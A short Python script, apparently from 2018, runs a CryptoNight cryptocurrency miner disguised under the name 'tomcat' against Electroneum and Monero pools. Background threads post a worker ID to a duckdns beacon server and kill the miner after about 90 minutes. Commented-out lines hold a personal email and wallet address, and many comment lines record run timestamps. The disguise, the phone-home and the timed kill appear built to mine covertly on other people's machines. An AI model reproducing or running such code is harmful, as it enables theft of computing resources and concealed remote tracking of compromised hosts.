import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:44:06.987994
#2018-02-17 17:33:05.064536
#2018-02-17 19:21:01.460478
#2018-02-17 21:10:07.625213
#2018-02-17 22:54:05.454939
#2018-02-18 00:39:05.451803
#2018-02-18 02:29:05.623602
#2018-02-18 04:16:06.629029
#2018-02-18 06:08:07.760255
#2018-02-18 07:59:06.365510
#2018-02-18 09:47:01.236719
#2018-02-18 11:33:07.404812
#2018-02-18 13:18:08.339893
#2018-02-18 15:08:05.776870
#2018-02-18 16:56:06.284152
#2018-02-18 18:45:07.261277
#2018-02-18 20:31:04.087452
#2018-02-18 22:17:01.665890
#2018-02-19 00:06:05.705868
#2018-02-19 01:52:07.294225
#2018-02-19 03:39:04.267693
#2018-02-19 05:24:07.063351
#2018-02-19 07:11:02.228491
#2018-02-19 08:58:06.464379
#2018-02-19 10:46:04.097920
#2018-02-19 12:35:02.237887
#2018-02-19 14:22:04.263690
#2018-02-19 16:11:08.922861
#2018-02-19 17:58:06.179006
#2018-02-19 19:44:01.855963
#2018-02-19 21:31:04.096017
#2018-02-19 23:17:04.302949
#2018-02-20 01:03:07.843160
#2018-02-20 02:51:06.141195
#2018-02-20 04:38:01.467112
#2018-02-20 06:22:04.306254
#2018-02-20 08:07:04.242229
#2018-02-20 09:53:08.212359
#2018-02-20 11:37:05.572942
#2018-02-20 13:24:09.082422
#2018-02-20 15:10:04.663896
#2018-02-20 16:55:01.427520
#2018-02-20 18:45:09.235737
#2018-02-20 20:37:01.270787
#2018-02-20 22:21:01.726829
#2018-02-21 00:02:05.902133
#2018-02-21 01:48:07.202110
#2018-02-21 03:37:07.611380
#2018-02-21 05:26:03.577416
#2018-02-21 07:13:07.949758
#2018-02-21 08:59:05.233684
#2018-02-21 10:51:06.284442
#2018-02-21 12:37:04.520146
#2018-02-21 14:26:07.387991
#2018-02-21 16:13:08.037349
#2018-02-21 18:05:05.197720
#2018-02-21 19:51:07.120271
#2018-02-21 21:37:05.403756
#2018-02-21 23:23:07.223639
#2018-02-22 01:12:08.027295
#2018-02-22 02:59:01.951614
#2018-02-22 04:45:07.209668
#2018-02-22 06:31:04.327480
#2018-02-22 08:18:04.068600
#2018-02-22 10:06:05.536936
#2018-02-22 11:52:01.459972
#2018-02-22 13:36:10.369167
#2018-02-22 15:25:04.470885
#2018-02-22 17:12:10.050233
#2018-02-22 18:59:09.645457
#2018-02-22 20:50:07.886643
#2018-02-22 22:35:08.574849
#2018-02-23 00:22:04.313851
#2018-02-23 02:10:04.028969
#2018-02-23 04:04:05.315608
#2018-02-23 05:51:07.175371
#2018-02-23 07:40:08.859756
#2018-02-23 09:43:08.295218
#2018-02-23 11:49:02.145681
#2018-02-23 13:39:06.287974
#2018-02-23 15:27:02.056240
#2018-02-23 17:18:09.290441
#2018-02-23 19:02:06.998975
#2018-02-23 20:48:01.406285
#2018-02-23 22:35:08.654768
#2018-02-24 00:21:07.491710
#2018-02-24 02:13:07.053234
#2018-02-24 04:02:07.635482
#2018-02-24 05:47:04.723035
#2018-02-24 07:38:07.475074
#2018-02-24 09:23:06.263708
#2018-02-24 11:17:04.317822
#2018-02-24 13:06:06.722560
#2018-02-24 14:57:04.231541
#2018-02-24 16:48:04.781675
#2018-02-24 18:36:08.145778
#2018-02-24 20:24:04.909812
#2018-02-24 22:20:01.405445
#2018-02-25 01:28:05.120474
#2018-02-25 05:24:03.937359
#2018-02-25 11:34:07.538086